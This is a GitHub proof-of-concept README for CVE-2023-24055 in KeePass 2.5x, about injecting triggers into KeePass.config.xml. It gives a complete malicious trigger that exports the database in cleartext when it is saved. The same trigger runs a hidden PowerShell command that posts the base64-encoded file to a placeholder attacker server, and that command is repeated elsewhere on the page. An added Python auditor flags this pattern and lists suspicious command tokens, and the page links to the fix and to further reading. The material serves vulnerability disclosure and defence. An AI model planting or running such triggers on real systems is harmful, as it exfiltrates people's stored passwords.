alt3kx/CVE-2023-24055_PoC

Latest commit: January 25, 2023 04:21

CVE-2023-24055 PoC (KeePass 2.5x)

Under discussion and analysis...

https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
https://sourceforge.net/p/keepass/feature-requests/2773/

An attacker who has write access to the KeePass configuration file can modify it and inject malicious triggers, e.g. to obtain the cleartext passwords by adding an export trigger.

https://nvd.nist.gov/vuln/detail/CVE-2023-24055
https://www.cve.org/CVERecord?id=CVE-2023-24055

My early PoC (KeePass 2.5x)

(1) An attacker who has write access to the KeePass configuration file KeePass.config.xml could inject a trigger such as the following:

<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>
</TriggerCollection>

(2) The victim opens KeePass and uses it as usual (saving changes, etc.); the trigger executes in the background and exfiltrates the credentials to the attacker's server.

Trigger PoC details

a) The trigger exports the KeePass database in KeePass XML (2.x) format, including all credentials in cleartext, to the following path, e.g.:

c:\Users\John\AppData\Local\Temp\exploit.xml 

b) Once the file has been exported, a second action can be defined to exfiltrate the XML data, base64-encoded, using PowerShell.exe, e.g.:

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

c) The data is exfiltrated to the attacker's web server, e.g.:

(screenshot omitted)

Trigger PoC values

Name: Trigger
Events: Saved database file | [Equals]
Conditions: <empty>
Actions: 

(1) Export active database 
File/URL: c:\Users\John\AppData\Local\Temp\exploit.xml
File/Format: KeePass XML (2.x)

(2) Execute command line / URL
File/URL: PowerShell.exe
Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))
Window style: Hidden
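The trigger above chains two KeePass actions: an export of the active database and a command-line execution that reads the exported file. The script below is an added defensive example, not part of this PoC and not KeePass code: it parses a TriggerCollection (or a full KeePass.config.xml, since it searches for any <Trigger> element rather than a fixed path), rates each trigger using the three type GUIDs taken from the PoC trigger, and computes a fingerprint of the trigger set so a known-good baseline can be kept and any change to the triggers in a writable config file alerted on. The SUSPICIOUS_COMMAND_TOKENS list, the severity levels and the benign placeholder trigger are assumptions of the example.

```python
# Added defensive example: audit KeePass trigger definitions for the
# export-then-execute pattern shown in this PoC. Not part of the PoC or of
# KeePass itself; standard library only.
import hashlib
import json
import xml.etree.ElementTree as ET

# Type GUIDs copied from the PoC trigger on this page. The "Trigger PoC values"
# section identifies them as the "Saved database file" event, the "Export active
# database" action and the "Execute command line / URL" action.
EVENT_SAVED_DATABASE_FILE = "s6j9/ngTSmqcXdW6hDqbjg=="
ACTION_EXPORT_ACTIVE_DB = "D5prW87VRr65NO2xP5RIIg=="
ACTION_EXECUTE_COMMAND = "2uX4OwcwTBOe7y66y27kxw=="

# Assumed heuristic (not KeePass logic): command lines containing these tokens
# usually reach the network or start a scripting host. Tune per environment.
SUSPICIOUS_COMMAND_TOKENS = ("powershell", "invoke-webrequest", "curl", "wget",
                             "bitsadmin", "certutil", "http://", "https://")

# Sample input 1: the PoC trigger from this page, whitespace condensed.
POC_TRIGGER_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection><Triggers><Trigger>
 <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid><Name>exploit</Name>
 <Events><Event><TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
  <Parameters><Parameter>0</Parameter><Parameter /></Parameters></Event></Events>
 <Conditions />
 <Actions>
  <Action><TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid><Parameters>
   <Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
   <Parameter>KeePass XML (2.x)</Parameter><Parameter /><Parameter /></Parameters></Action>
  <Action><TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid><Parameters>
   <Parameter>PowerShell.exe</Parameter>
   <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))</Parameter>
   <Parameter>False</Parameter><Parameter>1</Parameter><Parameter /></Parameters></Action>
 </Actions>
</Trigger></Triggers></TriggerCollection>"""

# Sample input 2: a constructed benign trigger with placeholder GUIDs.
BENIGN_TRIGGER_XML = """<TriggerCollection><Triggers><Trigger>
 <Guid>PLACEHOLDER-TRIGGER-GUID</Guid><Name>housekeeping</Name>
 <Events><Event><TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid></Event></Events>
 <Conditions /><Actions><Action><TypeGuid>PLACEHOLDER-ACTION-GUID</TypeGuid>
 <Parameters><Parameter>x</Parameter></Parameters></Action></Actions>
</Trigger></Triggers></TriggerCollection>"""


def parse_triggers(xml_text):
    """Return every <Trigger> in the document as a plain dict. Works for a
    standalone TriggerCollection and for a full KeePass.config.xml, because it
    walks the whole tree for <Trigger> elements instead of using a fixed path."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    triggers = []
    for trig in root.iter("Trigger"):
        actions = [{"type": a.findtext("TypeGuid", ""),
                    "params": [p.text or "" for p in a.iter("Parameter")]}
                   for a in trig.iter("Action")]
        triggers.append({"name": trig.findtext("Name", ""),
                         "events": [e.findtext("TypeGuid", "") for e in trig.iter("Event")],
                         "actions": actions})
    return triggers


def assess_trigger(trigger):
    """Rate one parsed trigger: HIGH when it both exports the database and runs
    a command, MEDIUM for either alone, INFO otherwise."""
    findings, export_paths, exports, executes = [], [], False, False
    for action in trigger["actions"]:
        params = action["params"] + ["", ""]          # pad so indexing is safe
        if action["type"] == ACTION_EXPORT_ACTIVE_DB:
            exports = True                            # params: File/URL, File/Format
            export_paths.append(params[0])
            findings.append(f"exports the active database to '{params[0]}' as '{params[1]}'")
        elif action["type"] == ACTION_EXECUTE_COMMAND:
            executes = True                           # params: File/URL, Arguments
            cmdline = (params[0] + " " + params[1]).lower()
            findings.append(f"executes '{params[0]}'")
            hits = [t for t in SUSPICIOUS_COMMAND_TOKENS if t in cmdline]
            if hits:
                findings.append("command line contains: " + ", ".join(hits))
            if any(p and p.lower() in cmdline for p in export_paths):
                findings.append("command line references the file written by the export action")
    if EVENT_SAVED_DATABASE_FILE in trigger["events"] and (exports or executes):
        findings.append("fires on 'Saved database file', i.e. during routine use")
    severity = "HIGH" if exports and executes else "MEDIUM" if exports or executes else "INFO"
    return {"name": trigger["name"], "severity": severity, "findings": findings}


def trigger_fingerprint(xml_text):
    """SHA-256 over the parsed trigger set. Store it as a baseline and alert when
    it changes; this also catches injected triggers that look benign."""
    canonical = json.dumps(parse_triggers(xml_text), sort_keys=True)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    for trig in parse_triggers(POC_TRIGGER_XML) + parse_triggers(BENIGN_TRIGGER_XML):
        report = assess_trigger(trig)
        print(f"[{report['severity']}] trigger '{report['name']}'")
        for finding in report["findings"]:
            print("   -", finding)
```

Run as-is, the PoC trigger is rated HIGH (export action, command execution that reads the export path, suspicious tokens, fires on save) and the constructed trigger INFO. For a real audit, feed it the user's KeePass.config.xml and compare trigger_fingerprint() with a stored baseline; since the cleartext credentials only leave KeePass through the export action, alerting on that action type is the highest-value check, and it is the same action the 2.53.1 change listed on this page (master key prompt on every export) addresses.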

Credentials...

PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password

(screenshots omitted)

Trigger public examples:

https://keepass.info/help/kb/trigger_examples.html

Fix released (changes from 2.53 to 2.53.1):

https://keepass.info/news/n230109_2.53.html

Removed the 'Export - No Key Repeat' application policy flag; KeePass now always asks for the current master key when trying to export data.

Further reading

(*) What this KeePass CVE means for organizations searching for new password vaults (Carlos Perez)

https://www.trustedsec.com/blog/what-this-keepass-cve-means-for-organizations-searching-for-new-password-vaults/
https://www.youtube.com/watch?v=OEaFaSjaZY4

(*) KeePass disputes report of flaw that could exfiltrate a database (Steve Zurier)

https://www.scmagazine.com/analysis/identity-and-access/keepass-disputes-report-of-flaw-that-could-exfiltrate-a-database

(*) Security Weekly News (06:56 KeePass)

https://www.youtube.com/watch?v=iz0PsYlH8Ig

(*) KeePass 2.53.1, a new version that fixes "the vulnerability" CVE-2023-24055 (IT Connect FR)

https://www.it-connect.fr/keepass-2-53-1-une-nouvelle-version-qui-corrige-la-vulnerabilite/
https://www.it-connect.fr/faille-critique-dans-keepass-un-attaquant-peut-exporter-les-mots-de-passe-en-clair/

(*) Tools

https://github.com/deetl/CVE-2023-24055
https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Orange-Cyberdefense/KeePwn

Author

Alex Hernandez, aka @_alt3kx_
